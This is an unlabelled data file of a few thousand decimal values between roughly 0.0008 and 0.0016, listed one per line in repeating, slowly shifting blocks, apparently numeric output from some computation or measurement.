0.0015312
0.00154423
0.0015312
0.0015312
0.00154422
0.0015442
0.00153119
0.00154214
0.00154214
0.00154214
0.00151582
0.00151582
0.00151582
0.00151582
0.00153132
0.00154417
0.00154214
0.00153335
0.00154411
0.00153126
0.00153337
0.00154423
0.00153119
0.00153131
0.00154214
0.00154417
0.00153335
0.00154411
0.00153337
0.00153126
0.00154423
0.00154422
0.00153177
0.0015312
0.0015312
0.00149613
0.00150914
0.00150913
0.00149612
0.00150915
0.00149611
0.00149612
0.00150913
0.00150913
0.00149611
0.00150705
0.00150705
0.00150705
0.00148074
0.00148074
0.00148074
0.00148074
0.00149624
0.00150909
0.00150705
0.00149826
0.00150904
0.00149618
0.00149827
0.00150915
0.00149612
0.00149623
0.00150704
0.00150909
0.00149826
0.00150904
0.00149827
0.00149617
0.00150915
0.00150915
0.00149669
0.00149613
0.00149612
0.00146105
0.00147406
0.00147405
0.00146104
0.00147407
0.00146104
0.00146105
0.00147406
0.00147405
0.00146105
0.00147197
0.00147196
0.00147197
0.00144565
0.00144565
0.00144565
0.00144565
0.00146116
0.00147402
0.00147195
0.00146317
0.00147396
0.0014611
0.00146318
0.00147407
0.00146104
0.00146116
0.00147195
0.00147401
0.00146317
0.00147396
0.00146318
0.00146109
0.00147407
0.00147406
0.00146161
0.00146104
0.00146104
0.00142598
0.00143899
0.00143898
0.00142597
0.00143899
0.00142596
0.00142598
0.00143899
0.00143898
0.00142597
0.00143688
0.00143688
0.00143688
0.00141057
0.00141057
0.00141057
0.00141057
0.00142607
0.00143892
0.00143687
0.00142809
0.00143887
0.00142601
0.00142809
0.00143899
0.00142596
0.00142607
0.00143686
0.00143893
0.00142808
0.00143887
0.00142809
0.00142602
0.00143898
0.00143898
0.00142651
0.00142596
0.00142596
0.00139089
0.0014039
0.0014039
0.00139088
0.00140392
0.00139088
0.00139089
0.0014039
0.00140389
0.00139088
0.0014018
0.0014018
0.0014018
0.00137548
0.00137548
0.00137549
0.00137549
0.00139099
0.00140385
0.00140178
0.001393
0.00140379
0.00139093
0.00139301
0.00140391
0.00139087
0.00139099
0.00140178
0.00140385
0.001393
0.00140379
0.00139301
0.00139093
0.0014039
0.0014039
0.00139143
0.00139088
0.00139088
0.00135581
0.00136882
0.00136882
0.00135581
0.00136883
0.0013558
0.00135581
0.00136882
0.00136881
0.00135581
0.00136672
0.00136672
0.00136672
0.00134041
0.00134041
0.00134041
0.00134041
0.00135592
0.00136877
0.0013667
0.00135792
0.00136872
0.00135586
0.00135793
0.00136883
0.0013558
0.00135592
0.00136671
0.00136877
0.00135792
0.00136872
0.00135794
0.00135586
0.00136883
0.00136883
0.00135636
0.0013558
0.0013558
0.00132074
0.00133375
0.00133375
0.00132073
0.00133375
0.00132073
0.00132075
0.00133376
0.00133374
0.00132073
0.00133164
0.00133164
0.00133165
0.00130533
0.00130533
0.00130533
0.00130533
0.00132084
0.0013337
0.00133163
0.00132285
0.00133364
0.00132079
0.00132286
0.00133376
0.00132073
0.00132084
0.00133163
0.0013337
0.00132285
0.00133365
0.00132286
0.00132079
0.00133375
0.00133376
0.00132128
0.00132073
0.00132073
0.00128566
0.00129867
0.00129866
0.00128565
0.00129868
0.00128564
0.00128565
0.00129867
0.00129866
0.00128565
0.00129656
0.00129656
0.00129656
0.00127025
0.00127024
0.00127025
0.00127024
0.00128576
0.00129862
0.00129655
0.00128777
0.00129856
0.0012857
0.00128777
0.00129868
0.00128565
0.00128576
0.00129655
0.00129862
0.00128777
0.00129856
0.00128777
0.0012857
0.00129867
0.00129868
0.0012862
0.00128564
0.00128565
0.00125057
0.00126358
0.00126358
0.00125056
0.00126359
0.00125055
0.00125057
0.00126358
0.00126358
0.00125056
0.00126147
0.00126147
0.00126147
0.00123515
0.00123515
0.00123515
0.00123515
0.00125067
0.00126353
0.00126146
0.00125268
0.00126347
0.00125061
0.00125268
0.00126359
0.00125056
0.00125067
0.00126146
0.00126353
0.00125268
0.00126347
0.00125268
0.00125061
0.00126359
0.00126359
0.0012511
0.00125056
0.00125055
0.00121547
0.0012285
0.00122848
0.00121547
0.0012285
0.00121546
0.00121547
0.00122849
0.00122848
0.00121547
0.00122638
0.00122638
0.00122638
0.00120006
0.00120005
0.00120005
0.00120005
0.00121557
0.00122844
0.00122636
0.00121758
0.00122838
0.00121552
0.00121759
0.0012285
0.00121546
0.00121557
0.00122636
0.00122844
0.00121758
0.00122838
0.00121759
0.00121551
0.00122849
0.00122849
0.00121601
0.00121546
0.00121546
0.00118037
0.00119339
0.00119338
0.00118036
0.00119339
0.00118036
0.00118037
0.00119339
0.00119338
0.00118036
0.00119128
0.00119128
0.00119128
0.00116495
0.00116495
0.00116495
0.00116495
0.00118047
0.00119333
0.00119126
0.00118248
0.00119328
0.00118041
0.00118249
0.0011934
0.00118036
0.00118048
0.00119127
0.00119334
0.00118248
0.00119328
0.00118249
0.00118042
0.0011934
0.0011934
0.00118091
0.00118036
0.00118036
0.00114526
0.00115828
0.00115828
0.00114525
0.00115829
0.00114525
0.00114527
0.00115829
0.00115828
0.00114526
0.00115617
0.00115617
0.00115618
0.00112984
0.00112984
0.00112984
0.00112984
0.00114536
0.00115823
0.00115616
0.00114738
0.00115818
0.00114531
0.00114738
0.00115829
0.00114526
0.00114537
0.00115616
0.00115824
0.00114738
0.00115818
0.00114738
0.00114531
0.00115829
0.0011583
0.00114581
0.00114525
0.00114525
0.00111015
0.00112318
0.00112317
0.00111014
0.00112318
0.00111014
0.00111015
0.00112317
0.00112317
0.00111014
0.00112106
0.00112106
0.00112106
0.00109472
0.00109472
0.00109472
0.00109472
0.00111025
0.00112312
0.00112105
0.00111226
0.00112307
0.00111019
0.00111227
0.00112318
0.00111013
0.00111025
0.00112105
0.00112312
0.00111226
0.00112306
0.00111227
0.00111019
0.00112318
0.00112318
0.00111069
0.00111014
0.00111014
0.00107504
0.00108806
0.00108806
0.00107503
0.00108807
0.00107502
0.00107503
0.00108806
0.00108805
0.00107502
0.00108595
0.00108594
0.00108594
0.00105961
0.00105961
0.00105961
0.0010596
0.00107513
0.00108801
0.00108593
0.00107715
0.00108795
0.00107508
0.00107715
0.00108806
0.00107502
0.00107513
0.00108593
0.001088
0.00107714
0.00108795
0.00107715
0.00107507
0.00108806
0.00108806
0.00107557
0.00107502
0.00107502
0.00103992
0.00105294
0.00105294
0.00103991
0.00105295
0.00103991
0.00103992
0.00105294
0.00105293
0.00103991
0.00105083
0.00105083
0.00105082
0.00102449
0.00102449
0.00102449
0.00102448
0.00104001
0.00105289
0.00105081
0.00104203
0.00105283
0.00103996
0.00104203
0.00105295
0.0010399
0.00104001
0.00105081
0.00105289
0.00104203
0.00105283
0.00104203
0.00103996
0.00105294
0.00105294
0.00104045
0.0010399
0.0010399
0.0010048
0.00101783
0.00101782
0.00100479
0.00101783
0.00100478
0.00100479
0.00101782
0.00101781
0.00100478
0.00101571
0.0010157
0.0010157
0.000989366
0.000989364
0.00098936
0.00098936
0.00100489
0.00101777
0.00101569
0.00100691
0.00101771
0.00100484
0.00100691
0.00101783
0.00100478
0.00100489
0.00101569
0.00101777
0.0010069
0.00101771
0.00100691
0.00100484
0.00101782
0.00101782
0.00100533
0.00100478
0.00100478
0.000969669
0.000982697
0.000982686
0.00096966
0.000982699
0.000969651
0.000969664
0.000982693
0.000982686
0.000969659
0.000980581
0.000980579
0.000980579
0.000954235
0.000954233
0.000954234
0.000954232
0.000969771
0.000982644
0.000980565
0.000971777
0.000982587
0.000969713
0.00097178
0.0009827
0.000969651
0.000969766
0.000980565
0.000982644
0.000971776
0.000982585
0.000971783
0.000969708
0.000982698
0.000982698
0.000970205
0.000969653
0.000969652
0.000934535
0.000947567
0.000947557
0.000934525
0.00094757
0.000934519
0.000934535
0.000947567
0.00094756
0.000934526
0.000945451
0.00094545
0.000945449
0.000919102
0.000919102
0.000919101
0.0009191
0.000934631
0.00094751
0.000945432
0.000936648
0.000947454
0.000934575
0.000936652
0.000947572
0.000934522
0.000934634
0.000945434
0.000947514
0.000936648
0.000947456
0.000936651
0.000934577
0.000947567
0.000947568
0.000935073
0.000934522
0.000934521
0.000899403
0.000912431
0.000912423
0.000899392
0.000912436
0.000899391
0.000899403
0.000912435
0.000912426
0.000899392
0.00091032
0.000910319
0.000910318
0.000883971
0.00088397
0.000883973
0.00088397
0.000899505
0.000912379
0.000910305
0.000901517
0.000912322
0.000899444
0.000901521
0.000912441
0.000899389
0.000899505
0.000910303
0.000912382
0.000901518
0.000912324
0.00090152
0.000899446
0.000912433
0.000912437
0.000899941
0.000899389
0.000899395
0.000864274
0.000877304
0.000877295
0.000864261
0.000877308
0.000864256
0.000864271
0.000877302
0.000877292
0.000864261
0.000875188
0.00087519
0.000875188
0.000848841
0.000848841
0.000848842
0.00084884
0.000864375
0.000877253
0.000875174
0.000866382
0.000877192
0.000864319
0.00086639
0.000877307
0.00086426
0.000864376
0.000875175
0.000877253
0.000866386
0.000877196
0.000866391
0.00086432
0.000877306
0.000877304
0.000864812
0.000864263
0.000864261
0.000829137
0.00084217
0.000842161
0.000829132
0.000842173
0.000829125
0.000829147
0.000842173
0.000842169
0.000829132
0.00084006
0.00084006
0.000840058
0.000813712
0.00081371
0.000813712
0.00081371
0.00082924
0.000842117
0.000840044
0.000831256
0.000842062
0.000829183
0.000831261
0.00084218
0.000829132
0.000829244
0.000840046
0.000842122
0.000831258
0.000842064
0.000831262
0.000829188
0.000842176
0.000842178
0.000829684
0.00082913
0.000829129
0.000794014
0.000807042
0.000807033
0.000794003
0.000807046
0.000793998
0.000794016
0.000807047
0.000807038
0.000794007
0.000804928
0.00080493
0.000804927
0.000778584
0.000778582
0.000778584
0.000778582
0.000794114
0.000806986
0.000804913
0.000796127
0.000806933
0.000794055
0.000796131
0.000807051
0.000794001
0.000794115
0.000804915
0.000806991
0.00079613
0.000806932
0.000796132
0.000794056
0.000807045
0.000807046
0.000794553
0.000794001
0.000794003
0.0016496
0.00163653
0.00164961
0.00163653
0.0016496
0.00164961
0.00163714
0.00163653
0.00163654
0.00161894
0.001632
0.00161894
0.001632
0.00163149
0.00161895
0.00161895
0.001632
0.001632
0.00163654
0.0016496
0.00163653
0.00164959
0.00163666
0.00164955
0.00164755
0.00163873
0.00163659
0.00163875
0.0016495
0.00163666
0.00164955
0.00164755
0.00163873
0.00163659
0.00163874
0.0016495
0.00163199
0.00161894
0.00163199
0.00161896
0.00163199
0.00161895
0.001632
0.00161896
0.0016319
0.00162993
0.00161901
0.00162116
0.00163195
0.00162995
0.00161908
0.0016319
0.00162993
0.00161901
0.00162116
0.00163195
0.00162995
0.00161908
0.0016496
0.00164961
0.00163714
0.00163653
0.00163654
0.00164961
0.00163653
0.00161894
0.001632
0.00163149
0.00161895
0.00161895
0.001632
0.00163201
0.00161894
0.00163201
0.00163666
0.00164955
0.00164755
0.00163873
0.0016366
0.00163874
0.0016495
0.00163655
0.0016496
0.00163653
0.00164959
0.00163666
0.00164755
0.00164955
0.00163872
0.00163874
0.00163659
0.00164949
0.00163199
0.00161895
0.001632
0.00161896
0.0016319
0.00162993
0.00161901
0.00162115
0.00163195
0.00162994
0.00161908
0.00163199
0.00161894
0.00163199
0.00161896
0.0016319
0.00162993
0.00162115
0.00161901
0.00162994
0.00163195
0.00161908
0.00163654
0.0016496
0.00163653
0.00164959
0.00163666
0.00164754
0.00164954
0.00163872
0.00163874
0.00163659
0.0016495
0.00163654
0.00164959
0.00163653
0.00164959
0.0016319
0.00162993
0.00161901
0.00162115
0.00163195
0.00162994
0.00161908
0.00163199
0.00161895
0.001632
0.00161896
0.0016319
0.00162993
0.00162115
0.00161901
0.00162994
0.00163195
0.00161908
0.00163199
0.00161895
0.001632
0.00161896
0.0016496
0.0016496
0.00163714
0.00163653
0.00163653
0.0016496
0.00163652
0.00161894
0.001632
0.00163149
0.00161895
0.00161895
0.001632
0.001632
0.00161894
0.001632
0.00163666
0.00164754
0.00164955
0.00163872
0.00163874
0.00163659
0.0016495
0.00163654
0.0016496
0.00163653
0.00164959
0.00163654
0.0016496
0.00163653
0.00164959
0.0016319
0.00162993
0.00162115
0.00161901
0.00162994
0.00163195
0.00161908
0.0016319
0.00162993
0.00162115
0.00161901
0.00162994
0.00163195
0.00161908
0.00163199
0.00161894
0.00163199
0.00161896
0.00163199
0.00161895
0.001632
0.00161896
0.0016496
0.00163652
0.0016496
0.00163652
0.00163149
0.00161895
0.00161895
0.001632
0.001632
0.00161894
0.001632
0.00161895
0.001632
0.00161442
0.00160137
0.00161443
0.00160137
0.00161442
0.00161443
0.00160198
0.00160138
0.00160138
0.00158382
0.00159686
0.00158382
0.00159686
0.00159635
0.00158382
0.00158382
0.00159686
0.00159685
0.00160139
0.00161442
0.00161441
0.00160138
0.00160151
0.00161437
0.00161237
0.00160357
0.00161433
0.00160144
0.00160358
0.00160151
0.00161437
0.00161237
0.00160356
0.00161432
0.00160144
0.00160358
0.00159685
0.00158382
0.00159685
0.00158384
0.00159685
0.00158382
0.00159685
0.00158384
0.00159676
0.00159478
0.00158388
0.00158601
0.0015968
0.00159479
0.00158396
0.00159676
0.00159478
0.00158388
0.00158601
0.00159681
0.00159479
0.00158395
0.00161442
0.00161442
0.00160198
0.00160138
0.00160138
0.00161443
0.00160137
0.00158382
0.00159686
0.00159634
0.00158382
0.00158383
0.00159686
0.00159686
0.00158382
0.00159686
0.00160151
0.00161437
0.00161236
0.00160356
0.00161432
0.00160144
0.00160357
0.00160139
0.00161442
0.00161441
0.00160138
0.00160151
0.00161236
0.00161437
0.00160356
0.00161432
0.00160357
0.00160144
0.00159685
0.00158382
0.00159685
0.00158383
0.00159676
0.00159478
0.00158388
0.00158601
0.0015968
0.00159479
0.00158395
0.00159685
0.00158382
0.00159685
0.00158383
0.00159676
0.00159478
0.00158601
0.00158388
0.00159479
0.0015968
0.00158395
0.00160139
0.00161442
0.00161441
0.00160138
0.00160151
0.00161236
0.00161437
0.00160356
0.00161432
0.00160357
0.00160144
0.00160139
0.00161442
0.00161441
0.00160138
0.00159676
0.00159478
0.00158388
0.00158601
0.0015968
0.00159479
0.00158396
0.00159685
0.00158382
0.00159685
0.00158384
0.00159676
0.00159478
0.00158601
0.00158388
0.00159479
0.00159681
0.00158396
0.00159685
0.00158382
0.00159685
0.00158384
0.00161442
0.00161442
0.00160198
0.00160138
0.00160138
0.00161442
0.00160137
0.00158382
0.00159686
0.00159634
0.00158382
0.00158382
0.00159686
0.00159686
0.00158382
0.00159686
0.00160151
0.00161236
0.00161437
0.00160356
0.00161432
0.00160358
0.00160144
0.00160139
0.00161441
0.00161441
0.00160138
0.00160139
0.00161442
0.00161441
0.00160138
0.00159676
0.00159478
0.00158601
0.00158388
0.00159479
0.0015968
0.00158396
0.00159676
0.00159478
0.00158601
0.00158388
0.00159479
0.0015968
0.00158396
0.00159685
0.00158382
0.00159685
0.00158384
0.00159685
0.00158382
0.00159685
0.00158384
0.00161443
0.00160137
0.00161443
0.00160138
0.00159634
0.00158382
0.00158383
0.00159686
0.00159686
0.00158382
0.00159686
0.00158382
0.00159686
0.00157931
0.00156627
0.0015793
0.00156627
0.00157931
0.0015793
0.00156687
0.00156628
0.00156628
0.00154873
0.00156176
0.00154873
0.00156176
0.00156124
0.00154874
0.00154874
0.00156176
0.00156176
0.00156628
0.0015793
0.0015793
0.00156627
0.00156639
0.00157925
0.00157724
0.00156845
0.00157921
0.00156634
0.00156847
0.0015664
0.00157925
0.00157724
0.00156845
0.0015792
0.00156633
0.00156847
0.00156174
0.00154873
0.00156175
0.00154874
0.00156174
0.00154873
0.00156175
0.00154875
0.00156165
0.00155967
0.00154879
0.00155091
0.00156171
0.00155969
0.00154886
0.00156165
0.00155968
0.00154879
0.00155091
0.0015617
0.00155969
0.00154886
0.00157931
0.00157931
0.00156687
0.00156628
0.00156628
0.00157931
0.00156627
0.00154873
0.00156176
0.00156124
0.00154874
0.00154874
0.00156176
0.00156176
0.00154873
0.00156176
0.0015664
0.00157925
0.00157724
0.00156845
0.0015792
0.00156633
0.00156846
0.00156628
0.0015793
0.00157929
0.00156628
0.0015664
0.00157724
0.00157925
0.00156844
0.0015792
0.00156846
0.00156634
0.00156174
0.00154874
0.00156175
0.00154874
0.00156165
0.00155967
0.0015488
0.00155091
0.00156171
0.00155969
0.00154886
0.00156174
0.00154874
0.00156176
0.00154874
0.00156165
0.00155967
0.00155091
0.0015488
0.00155969
0.00156171
0.00154886
0.00156628
0.0015793
0.00157929
0.00156627
0.00156639
0.00157724
0.00157925
0.00156845
0.0015792
0.00156846
0.00156633
0.00156628
0.0015793
0.00157929
0.00156627
0.00156164
0.00155967
0.00154879
0.00155092
0.00156171
0.00155969
0.00154886
0.00156174
0.00154874
0.00156175
0.00154874
0.00156164
0.00155967
0.00155091
0.0015488
0.00155969
0.0015617
0.00154886
0.00156174
0.00154874
0.00156175
0.00154874
0.00157931
0.00157931
0.00156687
0.00156628
0.00156628
0.00157931
0.00156628
0.00154873
0.00156176
0.00156124
0.00154874
0.00154874
0.00156177
0.00156177
0.00154873
0.00156176
0.0015664
0.00157724
0.00157925
0.00156845
0.00157921
0.00156846
0.00156634
0.00156629
0.0015793
0.0015793
0.00156628
0.00156629
0.0015793
0.0015793
0.00156628
0.00156166
0.00155967
0.00155091
0.00154879
0.00155969
0.00156171
0.00154886
0.00156166
0.00155967
0.00155091
0.00154879
0.00155969
0.00156171
0.00154886
0.00156174
0.00154874
0.00156176
0.00154874
0.00156174
0.00154873
0.00156175
0.00154874
0.00157931
0.00156627
0.00157931
0.00156627
0.00156124
0.00154874
0.00154874
0.00156176
0.00156176
0.00154873
0.00156176
0.00154873
0.00156176
0.00154422
0.0015312
0.00154423
0.00153119
0.00154422
0.00154423
0.00153178
0.0015312
0.0015312
0.00151366
0.00152669
0.00151365
0.00152668
0.00152614
0.00151366
0.00151366
0.00152669
0.00152668
0.0015312
0.00154422
0.0015442
0.0015312
0.00153132
0.00154417
0.00154214
0.00153335
0.00154412
0.00153125
0.00153336
0.00153132
0.00154417
0.00154214
0.00153335
0.00154411
0.00153126
0.00153336
0.00152667
0.00151366
0.00152668
0.00151367
0.00152666
0.00151366
0.00152668
0.00151367
0.00152657
0.00152457
0.00151372
0.00151581
0.00152663
0.00152459
0.00151378
0.00152658
0.00152457
0.00151372
0.00151582
0.00152664
0.00152459
0.00151378
0.00154423
0.00154422
0.00153178
0.00153121
0.0015312
0.00154423
0.0015312
0.00151366
0.00152669
0.00152614
0.00151367
0.00151367
0.00152669
0.00152669
0.00151366
0.00152669
0.00153131
0.00154417
0.00154214
0.00153335
0.00154411
0.00153125
0.00153336
0.0015312
0.00154422
0.0015442
0.0015312
0.00153132
0.00154214
0.00154417
0.00153335
0.00154411
0.00153336
0.00153125
0.00152666
0.00151366
0.00152668
0.00151367
0.00152657
0.00152458
0.00151371
0.00151581
0.00152662
0.00152459
0.00151378
0.00152667
0.00151366
0.00152668
0.00151367
0.00152657
0.00152458
0.00151581
0.00151372
0.00152459
0.00152663
0.00151378
0.0015312
0.00154422
0.0015442
0.0015312
0.00153132
0.00154214
0.00154417
0.00153335
0.00154411
0.00153336
0.00153125
0.00153121
0.00154422
0.0015442
0.0015312
0.00152657
0.00152458
0.00151372
0.00151582
0.00152663
0.00152459
0.00151379
0.00152667
0.00151366
0.00152668
0.00151367
0.00152657
0.00152458
0.00151582
0.00151372
0.00152459
0.00152663
0.00151379
0.00152667
0.00151367
0.00152668
0.00151367
0.00154422
0.00154422
0.00153178
0.0015312
0.0015312
0.00154422
0.00153119
0.00151366
0.00152669
0.00152614
0.00151367
0.00151366
0.00152668
0.00152669
0.00151365
0.00152669
0.00153131
0.00154214
0.00154416
0.00153335
0.00154411
0.00153337
0.00153125
0.0015312
0.00154421
0.0015442
0.00153119
0.0015312
0.00154421
0.0015442
0.00153119
0.00152657
0.00152457
0.00151582
0.00151371
0.00152459
0.00152663
0.00151378
0.00152657
0.00152458
0.00151581
0.00151372
0.00152459
0.00152663
0.00151378
0.00152666
0.00151366
0.00152668
0.00151367
0.00152666
0.00151366
0.00152668
0.00151367
0.00154423
0.0015312
0.00154422
0.00153119
0.00152614
0.00151367
0.00151367
0.00152669
0.00152668
0.00151366
0.00152669
0.00151366
0.00152669
0.00150915
0.00149612
0.00150914
0.00149611
0.00150915
0.00150914
0.00149669
0.00149612
0.00149611
0.00147858
0.00149161
0.00147857
0.0014916
0.00149105
0.00147858
0.00147858
0.00149161
0.0014916
0.00149613
0.00150914
0.00150913
0.00149612
0.00149624
0.00150909
0.00150704
0.00149825
0.00150903
0.00149618
0.00149827
0.00149624
0.00150909
0.00150704
0.00149826
0.00150903
0.00149617
0.00149827
0.00149159
0.00147858
0.0014916
0.00147859
0.00149159
0.00147858
0.0014916
0.00147859
0.00149149
0.00148948
0.00147864
0.00148072
0.00149155
0.00148949
0.0014787
0.00149149
0.00148949
0.00147863
0.00148073
0.00149154
0.0014895
0.0014787
0.00150915
0.00150915
0.00149669
0.00149612
0.00149613
0.00150915
0.00149612
0.00147858
0.00149161
0.00149106
0.00147858
0.00147859
0.0014916
0.00149161
0.00147859
0.00149162
0.00149624
0.00150908
0.00150704
0.00149826
0.00150903
0.00149617
0.00149827
0.00149613
0.00150914
0.00150913
0.00149612
0.00149624
0.00150704
0.00150909
0.00149826
0.00150903
0.00149827
0.00149618
0.00149159
0.00147858
0.0014916
0.00147859
0.00149149
0.00148949
0.00147863
0.00148072
0.00149154
0.00148949
0.0014787
0.00149159
0.00147858
0.0014916
0.00147859
0.00149149
0.00148948
0.00148072
0.00147863
0.00148949
0.00149155
0.0014787
0.00149614
0.00150914
0.00150913
0.00149613
0.00149624
0.00150704
0.0015091
0.00149826
0.00150904
0.00149827
0.00149618
0.00149614
0.00150915
0.00150913
0.00149613
0.0014915
0.00148949
0.00147865
0.00148073
0.00149155
0.0014895
0.00147871
0.0014916
0.00147859
0.00149161
0.0014786
0.0014915
0.00148949
0.00148073
0.00147864
0.0014895
0.00149155
0.00147871
0.0014916
0.00147859
0.00149161
0.0014786
0.00150915
0.00150914
0.00149669
0.00149612
0.00149611
0.00150914
0.00149611
0.00147857
0.00149161
0.00149105
0.00147858
0.00147858
0.00149161
0.0014916
0.00147858
0.0014916
0.00149623
0.00150704
0.0015091
0.00149826
0.00150903
0.00149827
0.00149618
0.00149613
0.00150914
0.00150913
0.00149611
0.00149613
0.00150914
0.00150913
0.00149612
0.00149149
0.00148949
0.00148073
0.00147864
0.0014895
0.00149154
0.0014787
0.00149149
0.00148949
0.00148073
0.00147863
0.0014895
0.00149155
0.0014787
0.00149159
0.00147858
0.0014916
0.00147859
0.00149159
0.00147858
0.0014916
0.00147859
0.00150916
0.00149612
0.00150915
0.00149612
0.00149106
0.00147858
0.00147858
0.00149161
0.00149161
0.00147858
0.00149161
0.00147858
0.00149161
0.00147407
0.00146104
0.00147407
0.00146104
0.00147406
0.00147406
0.00146161
0.00146104
0.00146104
0.0014435
0.00145653
0.0014435
0.00145653
0.00145597
0.00144351
0.00144351
0.00145653
0.00145653
0.00146105
0.00147406
0.00147405
0.00146104
0.00146116
0.00147401
0.00147195
0.00146318
0.00147396
0.00146109
0.00146318
0.00146116
0.00147401
0.00147195
0.00146318
0.00147396
0.0014611
0.00146318
0.00145652
0.00144351
0.00145652
0.00144352
0.00145652
0.00144351
0.00145652
0.00144351
0.00145641
0.00145441
0.00144356
0.00144564
0.00145647
0.00145441
0.00144362
0.00145641
0.0014544
0.00144356
0.00144564
0.00145647
0.00145441
0.00144362
0.00147406
0.00147407
0.0014616
0.00146104
0.00146104
0.00147408
0.00146104
0.0014435
0.00145653
0.00145597
0.0014435
0.0014435
0.00145653
0.00145653
0.0014435
0.00145653
0.00146116
0.001474
0.00147195
0.00146317
0.00147395
0.0014611
0.00146318
0.00146105
0.00147406
0.00147405
0.00146104
0.00146116
0.00147195
0.00147401
0.00146317
0.00147395
0.00146318
0.00146109
0.00145652
0.00144351
0.00145653
0.00144352
0.00145641
0.0014544
0.00144356
0.00144563
0.00145647
0.00145441
0.00144362
0.00145652
0.00144351
0.00145652
0.00144352
0.00145641
0.0014544
0.00144564
0.00144356
0.00145441
0.00145647
0.00144362
0.00146106
0.00147407
0.00147406
0.00146105
0.00146116
0.00147196
0.00147401
0.00146318
0.00147396
0.00146318
0.0014611
0.00146106
0.00147407
0.00147406
0.00146105
0.00145641
0.00145441
0.00144355
0.00144564
0.00145647
0.00145441
0.00144362
0.00145652
0.0014435
0.00145653
0.00144351
0.00145641
0.00145441
0.00144564
0.00144356
0.00145441
0.00145647
0.00144362
0.00145652
0.0014435
0.00145653
0.00144351
0.00147406
0.00147407
0.0014616
0.00146104
0.00146104
0.00147407
0.00146104
0.0014435
0.00145653
0.00145597
0.0014435
0.0014435
0.00145653
0.00145652
0.0014435
0.00145653
0.00146115
0.00147196
0.00147401
0.00146318
0.00147396
0.00146318
0.00146109
0.00146105
0.00147407
0.00147405
0.00146104
0.00146105
0.00147406
0.00147406
0.00146104
0.00145641
0.0014544
0.00144564
0.00144356
0.00145441
0.00145647
0.00144362
0.00145641
0.00145441
0.00144564
0.00144355
0.00145441
0.00145647
0.00144362
0.00145651
0.0014435
0.00145652
0.00144351
0.00145651
0.0014435
0.00145652
0.00144351
0.00147407
0.00146104
0.00147407
0.00146103
0.00145598
0.0014435
0.0014435
0.00145653
0.00145652
0.0014435
0.00145653
0.0014435
0.00145653
0.001439
0.00142596
0.001439
0.00142596
0.00143899
0.00143899
0.00142652
0.00142596
0.00142596
0.00140842
0.00142145
0.00140842
0.00142145
0.00142088
0.00140842
0.00140842
0.00142145
0.00142145
0.00142598
0.00143899
0.00143898
0.00142597
0.00142608
0.00143894
0.00143686
0.00142808
0.00143887
0.00142602
0.00142809
0.00142608
0.00143893
0.00143686
0.00142808
0.00143887
0.00142602
0.00142809
0.00142143
0.00140842
0.00142145
0.00140843
0.00142144
0.00140843
0.00142145
0.00140844
0.00142133
0.00141931
0.00140847
0.00141055
0.00142139
0.00141932
0.00140853
0.00142134
0.00141931
0.00140848
0.00141055
0.00142139
0.00141932
0.00140853
0.00143899
0.00143898
0.00142652
0.00142596
0.00142595
0.00143899
0.00142595
0.00140843
0.00142145
0.00142088
0.00140843
0.00140842
0.00142145
0.00142144
0.00140841
0.00142144
0.00142608
0.00143893
0.00143686
0.00142809
0.00143887
0.00142602
0.00142809
0.00142597
0.00143899
0.00143898
0.00142596
0.00142608
0.00143687
0.00143893
0.00142809
0.00143887
0.0014281
0.00142602
0.00142144
0.00140842
0.00142145
0.00140843
0.00142133
0.00141932
0.00140847
0.00141055
0.00142139
0.00141932
0.00140854
0.00142143
0.00140842
0.00142144
0.00140843
0.00142133
0.00141932
0.00141055
0.00140848
0.00141932
0.00142139
0.00140854
0.00142597
0.00143898
0.00143898
0.00142596
0.00142607
0.00143687
0.00143893
0.00142809
0.00143887
0.00142809
0.00142601
0.00142597
0.00143898
0.00143898
0.00142596
0.00142132
0.00141931
0.00140847
0.00141055
0.00142138
0.00141932
0.00140854
0.00142143
0.00140842
0.00142144
0.00140843
0.00142133
0.00141931
0.00141055
0.00140847
0.00141932
0.00142139
0.00140853
0.00142143
0.00140842
0.00142144
0.00140843
0.00143899
0.00143899
0.00142652
0.00142596
0.00142596
0.00143899
0.00142596
0.00140842
0.00142145
0.00142088
0.00140842
0.00140842
0.00142144
0.00142145
0.00140842
0.00142145
0.00142607
0.00143687
0.00143893
0.00142809
0.00143887
0.00142809
0.00142601
0.00142598
0.00143899
0.00143898
0.00142596
0.00142597
0.00143898
0.00143898
0.00142596
0.00142133
0.00141931
0.00141055
0.00140848
0.00141932
0.00142139
0.00140854
0.00142133
0.00141931
0.00141055
0.00140848
0.00141932
0.00142139
0.00140854
0.00142144
0.00140842
0.00142145
0.00140843
0.00142144
0.00140842
0.00142144
0.00140843
0.00143899
0.00142595
0.00143899
0.00142596
0.00142088
0.00140842
0.00140842
0.00142144
0.00142144
0.00140842
0.00142145
0.00140842
0.00142145
0.00140391
0.00139088
0.00140391
0.00139088
0.0014039
0.0014039
0.00139143
0.00139088
0.00139088
0.00137334
0.00138637
0.00137334
0.00138637
0.0013858
0.00137334
0.00137334
0.00138636
0.00138636
0.00139089
0.00140391
0.0014039
0.00139088
0.00139099
0.00140385
0.00140178
0.001393
0.00140379
0.00139093
0.00139301
0.00139099
0.00140385
0.00140178
0.001393
0.00140378
0.00139094
0.00139301
0.00138635
0.00137334
0.00138636
0.00137335
0.00138635
0.00137335
0.00138636
0.00137335
0.00138625
0.00138423
0.0013734
0.00137547
0.00138631
0.00138424
0.00137346
0.00138625
0.00138423
0.0013734
0.00137547
0.00138631
0.00138424
0.00137346
0.00140391
0.0014039
0.00139143
0.00139088
0.00139088
0.00140391
0.00139088
0.00137334
0.00138637
0.0013858
0.00137334
0.00137334
0.00138637
0.00138636
0.00137334
0.00138637
0.00139099
0.00140385
0.00140178
0.001393
0.00140379
0.00139093
0.00139301
0.00139089
0.0014039
0.00140389
0.00139088
0.00139099
0.00140178
0.00140385
0.001393
0.00140379
0.00139301
0.00139093
0.00138636
0.00137334
0.00138636
0.00137335
0.00138624
0.00138423
0.00137339
0.00137547
0.00138631
0.00138424
0.00137346
0.00138636
0.00137334
0.00138636
0.00137335
0.00138624
0.00138424
0.00137547
0.00137339
0.00138424
0.00138631
0.00137346
0.00139089
0.0014039
0.00140389
0.00139088
0.00139099
0.00140178
0.00140385
0.001393
0.00140379
0.00139301
0.00139094
0.00139089
0.0014039
0.00140389
0.00139088
0.00138624
0.00138423
0.0013734
0.00137547
0.0013863
0.00138424
0.00137346
0.00138635
0.00137334
0.00138636
0.00137335
0.00138625
0.00138423
0.00137547
0.0013734
0.00138424
0.00138631
0.00137346
0.00138635
0.00137334
0.00138636
0.00137336
0.0014039
0.0014039
